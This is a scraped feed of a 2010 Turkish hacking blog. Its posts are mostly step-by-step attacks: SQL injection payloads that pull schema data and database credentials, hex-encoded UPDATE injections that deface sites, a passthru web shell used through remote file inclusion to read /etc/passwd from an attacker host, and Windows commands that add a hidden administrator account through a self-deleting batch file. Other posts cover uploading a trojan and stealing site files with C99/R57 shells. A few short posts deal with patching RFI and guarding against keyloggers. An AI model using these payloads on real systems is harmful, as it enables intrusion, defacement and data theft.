adlı databaseden satırları okuyarak tüm db isimleri ve kolon+satırları elde ederiz.<br /><br />/**/union/**/select/**/0,1,2,concat(COLUMN_NAME,0×2020,TABLE_NAME,0×2020, TABLE_SCHEMA),4,5,6,7+from+information_schema.colu mns+limit+1,8/*<br /><br />1 kayıttan baslıyoruz , 8. son kayıta kadar sorguluyoruz.<br /><br />Example :<br /><br />SELECT * FROM `users` LIMIT 1, 8 <br /><br /><br /><br />/**/union/**/select/**/0,1,2,concat(table_name),4,5,6,7+from+information_ schema.tables+where=’DB_NAME’+limit 1,8/*<br /><br />Engel oldugunu varsayıyorum ,<br /><br />union select 0,1,2 unhex((hex(table_name))) 4,5,6,7 from information_schema.tables where char(ascicode(DB_NAME)) limit 1,8<br /><br /><br /><br />* Yukarıda load_file ile yaptıgım atağın sonucu geldı.<br /><br /><?<br />// Database Server<br />$forum_server = “localhost”; // Ben yerel sunucumu (Localhost) ele alıyorum.<br />// Database User Name<br />$forum_un = “root”;<br />// Database Password<br />$forum_pw = “123”;<br />// Database name<br />$forum_database = “SQL”;<br />?><br /><br />Serverdakı dizinleri okuyup ozn adlı userin veritabanı baglantı<br />bilgilerini ele gecirdik , yani anahtarı aldık..<br /><br />Hatasız kul olmaz Hata varsa düzeltirsin :)Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-46253323496584186472010-09-13T08:28:00.000-07:002010-09-15T03:17:34.153-07:00Rfi açığını kapatmaMerhaba arkadaşlar herkes rfi'nin nasıl kulanıldığını bilir ama açığı nasıl kapatabiliriz onu bilmez bu yazıda rfi konusunda alınabilecek önlemler anlatılmıştır.<br /><br />Eğer sitenizde GET ve POST komutlarını içeren satırlar kullanıyorsanız ve bu komutların yazımlarını<br />yanlış yaparsanız sitenizde geri dönüşü olmayan bir açık oluşabilir. Şimdi bu açığı kapatmanın<br />yollarına bakalım.<br /><br />Bu kod $page girişi tam olarak arındırılmadığı için kullanılmamalıdır. $page input direkt olarak web sayfasına yönlendirilmiş ki bu yapılması gereken en son hatalardan biridir. Daima browserdan geçen her input (giriş) arındırılmalı. Kullanıcı web sayfasını ziyaret ettiğinde "files.php"yi ziyaret etmek için "File"a tıkladığında şöyle bir şey görünecek.<br /><blockquote><a href=index.php?page=file1.php>Files</a><br /><?php<br />$page = $_GET[page];<br />include($page);<br />?></blockquote><br />Bu koda istinaden aşağıdaki şekilde bir adres girersek browserımızdan neler olabilir?<br /><blockquote>http://localhost/index.php?page=http://google.com</blockquote><br />Büyük ihtimalle $page değişkeninin sayfaya orjinal olarak konulduğu yerde, google.com ana sayfasını elde ederiz. Burası kodcunun canının yakılabileceği yerdir. Web sayfasında olabilen daha basit bir şeye bakalım. RFI exploitinin daha çabuk ve kirli kullanımı sizin avantajınızadır. Şimdi "test.php" isimli bir dosya oluşturalım ve aşağıdaki kodu içine koyup kaydedelim.<br /><blockquote><?php<br />passthru($_GET[cmd]);<br />?></blockquote><br />Şimdi bu dosya, üzerinde RFI exploiti olan bir sayfaya dahil etmek için avantajınıza kullanabileceğiniz bir şeydir. PHP içindeki passthru() komutu çok tehlikelidir ve birçok host bunu "güvenlik nedenlerinden dolayı hizmet dışıdır" olarak alırlar. test.php içindeki bu kodla web sayfasına file inclusion exploiti de içeren şöyle bir istek gönderebiliriz<br /><blockquote>http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd</blockquote><br />Örnek olarak sitenizde kullandığınız satırlardan biri; $ornek = $HTTP_GET_VARS[“ornek”]; diyelim. Bu satırda kullanmış olduğunuz tırnaklar dışarıdan gelen uyarılara karşı son derece duyarlıdır. Yani kişi isterse “ornek” kodlaması yerine başka bir sunucudan exploit çağırabilir. Örneğin; http://www.sizinsite.com/index.php?urun=http://www.exploitsitesi.com/exploit.pl bu şekilde bir adresleme kullanıldığı takdirde exploit sizin sunucunuza yüklenir. Bu açığı kolay bir yöntemle kapatabilirsiniz. Öncelikle yapmanız gereken kullanmış olduğunuz GET ve POST komutunun içeriği. Eğer GET yada POST komutu ile veritabanına bağlantı yapıyorsanız bu bağlantıyı komuttan önce tanımlayın;<br /><blockquote>$veriadi = “veriadi”.$id;</blockquote><br />Daha sonra komutunuzu tırnak kullanmadan, başına dolar ($) koyarak sanki veritabanından çağırma yapıyorsunuz gibi kullanın;Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-88573334915828707692010-08-03T09:02:00.000-07:002010-08-11T04:37:33.440-07:00Update olmaya sitelerde char kulanımımerhaba arkadaşlar bu yazımda tek harf update olan yada harf update olmayan sitelerde char'lama <br /><br />yönteminden bahsedecem ;<br /><br />Bir siteye girdiniz hata aldınız baktınız unclosed var tablo ve kolon adlarını çekerek update yapabilirsiniz <br /><br />tablo ve kolon adlarını aldıktan sonra bakıyorsunuz update olmuyor işte o sırada harflerle update yi <br /><br />engellemişlerdir ne yapabiliriz <br /><br />siteye yazacağımızı yazıyı char layarak yani şifreleyerek siteye update yapabiliriz <br /><br />mesela şu şekil <br /><br />http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur='Hacked By Vezir;--<br /><br />bu şekil update olmadı ama tek harf yaptığınızda update oldu <br /><br />http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur='H;--<br /><br />burda hacked by vezir kısmını char lıyarak yada hexe çevirerek update yapabilirsiniz<br /><br />http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur=0x3c68313e4861636b65642062792056657a69722e3034;--<br /><br />http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur=CHAR(86)+CHAR(101)%20CHAR(122)%20CHAR(105)%20CHAR(114)%20CHAR(46)%20CHAR(48)%20CHAR(52);--<br /><br />bu şekilde update yapabilirsinizVezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com1tag:blogger.com,1999:blog-4818381281339221921.post-51277911075517564842010-08-03T08:31:00.000-07:002010-08-03T08:32:30.397-07:00Injection FlawsInjection Flaws <br /><br />Dinamik SQL sorgularının kullanıldığı sistemlerde oluşabilecek bir açıktır. <br /><br />Bir kullanıcı adı parola sınaması yapılan SQL cümleciğinde kullanılabilir. <br /><br />Select MemberID<br /><br />From Member <br /><br />Where Username = '" + txtUsername.Text + "' and Password = '" + txtPassword.Text + "'"<br /><br />Şeklinde bir SQL cümlesinin kullanıldığı bir sistemde aşağıdaki ifadeleri girelim<br /><br />txtUsername.Text : ' or 1=1 -- <br /><br />txtPassword.Text : 123-- <br /><br />ifadesi aşağıdaki SQL cümlesinin çalıştırılmasını sağlar<br /><br />Select MemberID <br /><br />From Member <br /><br />Where Username =or 1=1 -- ' and Password = ' " + txtPassword.Text + "'"-- ifadesi SQL Server için <br /><br />yorum satırı anlamına geldi için çalıştırılmaz.<br /><br />Where ifadesini inceleyelim : <br /><br />Username = '' false döner, 1 = 1 ise true. Or karşılaştırmasında ise False or True’nun sonucu true’dur.<br /><br />Dolayısıyla doğru kullanıcı adı parola girilmese dahi geriye tüm kayıtlar döner ve hacker ilk kaydın <br /><br />yetkisi ile içeriye giriş yapmış olur.Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-14536642552096751962010-06-28T04:45:00.000-07:002011-12-28T10:30:01.602-08:00Win serverda root olma teknikleriMerhaba arkaşlar win server la ilgili bir döküman yazmak istedim fazla<br />uzatmadan başlıyalım.bu yöntemi çogu kişi bilir eski bir yöntemdir bilmeyenler vardır diye düşünüp yayınlıyorum.<br /><br />bir win servera fso destekli bir scriptle girdigimiz zaman cmd ile<br /><br />uzaktan komut iLe user ekleyip ;<br /><br />net user vezir 123456 /add <br /><br />şekLinde sonra net user localgroup administrator vezir /add <br /><br />şeklinde admin yetkisi verip server ip aLıp uzak masaüstü iLe bağlanıp istedigimizi yaparız bu bir yöntem ;<br /><br />Eğer ki user ekeleyemezseniz <br />net user administrator /random <br /><br />komutuyla mevcut kullanicilarin şifrelerini öğrenebilirsiniz ;<br /><br />ama şöyle düşünelİm bir Nt servera girdik ve komut girme yetkimiz yok.<br /><br />neLer yapabiliriz şimdi uzaktan komut verip user ekLeyemiyoruz ama komut çaLıştırabiLiyoruz.<br /><br />o zaman hemen size bir puf noktası veriyorum. yazdığımız bir kodu .bat formatına çevirip uzaktan user ekliyecez<br /><br />hemen başlıyalım bir txt açın ;<br /><br />içine <br /><br />@echo<br />net user vezir 123456 /add<br /><br />yazın ve vezir.bat die kayıt edin çalıştırın ve denetim masasından kullanıcı hesapLarına baktığınız zaman<br /><br />vezir adında bir user oluşturmuş olacak,<br /><br />şimdi hemen bir txt açıyoruz içine<br /><br />@echo<br />net user vezir 123456 /add<br />del vezir.bat<br /><br />yazıyoruz ve vezir.bat die kaydediyoruz ve çalıştırıyoruz <br /><br />ve komuttan sonra vezir.bat silinecegini göreceksiniz ve bu sayede fso içinde komut ekletip<br /><br />useri ekletip aynı şekilde administrator yetkisi vererek dosyaları sildirip root düzeyine erişebilİrsiniz.<br /><br />başka bir yöntem ; trojen ile buda basit bir olaydır arkadaşLar bir key bulun kendi serverınızı oluşturun.<br /><br />ve win servera upload edin :] serverda dosyayı çaLıştırın ve trojan buluşacaktır. gidin proğramın clientini<br /><br />açın ipden bağlanın ve client sayesinde proğram sayesinde pc ye bağlanın.<br /><br /><br />Bir daha ki dökümanda görüşmek dileği ileVezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-86645502021581377822010-06-28T04:31:00.000-07:002010-06-28T04:32:05.148-07:00KeyloggerLardan KorunmakAçıklama : S.a Son Zamanlarda Bu Tür Keyloggerlar Her yerde Görülmeye Başladı Hatta NTVMSNBC Sitesine Bile Kod Koyarak Oraya Erişim Saglıyan İNTERNET Kullanıcılarına Büyük Tuzak Kurmuştular. Bu Keyloggerlar Kalvye'de Basılan Her Tuşu Kayıta Alıp "Hacker" veya Tuzak Kuran Kİşiye Gönderilir Tabi Bu Bilgiler ; Kredi Kartınız Olabilir , Sitenizin Şifreleri , Msn ŞifeLeriniz, Veya Daha Önemli Bİlgiler Olabilir. <br /><br />Bu Program Bize Ne Kolaylıklar Saglıyacak ; <br /><br />- Windows da yazdığımız yazıların kayıtlanmasını.<br />- Klavyeden bastığımız her tuşun kayıtlanmasını.<br />- Kopyala yapıştır yaparak girdiğimiz yazıların, şifrelerin kaydedilmesini.<br />- O anda açık olan penceremizin screenshot'unun(ekran görüntüsünün) alınmasını.<br />- Her türlü spy programlarının saldırısını.<br />- HARDWARE KEYLOGGER'ların yazılarımızı, şifrelerimizi loglamasını.<br />Program'ı İndirip Kurduktan Sonra Çalıştırılması İçin ;<br /><br /><br />PHP- Kodu:<br /><br /><Ctrl>+<Alt>+<Shift>+<P> <br /><br />PrivacyKeyboard Açılacaktır Ondan Sonra BANKA , MSN , MAİL Şifrelerinizi buradan Girerek Daha Güvenli Olmaktadır.<br /><br />Unutmayın İnternet %100 Güvenli Degildir Sadece Bu Önlemdir..<br /><br /><br />İndir<br /><br />http://anti-keylogger.com/downloads/prvkbd.zipVezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-13611425789516753152010-06-28T04:20:00.001-07:002010-06-28T04:22:52.142-07:00Script çekmeBir sitenin serverına girdiniz sitenin scripti hoşunuza gitti acaba nasıl bu scripti çekerim diyorsanız işte yapmanız gerekenler<br /><br />C99 atıyoruz servera ve databaseye bağlanıyoruz.Oralarda DUMP yazan bi buton olucak ona basarız ve SQL dosyası PC'ye inmeye başlar..<br /><br />R57 atıyoruz siteye ve komut satırımıza yani run command yazan yere alttaki komutu yazıyoruz.<br /><br />Kod:<br /> <br />cd /İSTEDĞİNİZ SİTENİN UShome/SCRİPTİNİ ER ADI/public_html/;tar cvzf /home/KAYDETME DİZİN/public_html/yedek.tar.gz *<br /><br />Böylece rarlanmış olarak inicek PC'ye dosyalar..Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com1tag:blogger.com,1999:blog-4818381281339221921.post-11102509553960169112010-06-28T03:53:00.000-07:002010-06-28T03:59:28.513-07:00MerhabaMerhaba arkadaşlar tüm arkadaşların blogu var bende bir tane blog açayım dedim. Kendim hakkında verebileceğim pek bir bilgi yok ama yinede bir kaç şey yazayım doğubeyazıtlıyım sanal ortamda web tasarımı olsun site güvenliği hakkında kendimi geliştirmeye çalışıyorum. Bazıları gibi kendimi kimseden üstünde görmüyorum kimsenin altında da değilim bu kadar yeter herhalde :D bloguda elimden geldiğince güncel tutmaya çalışacam.<br />Herşeyin hayırlısı olsun diyip konuyu bitirelim.Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0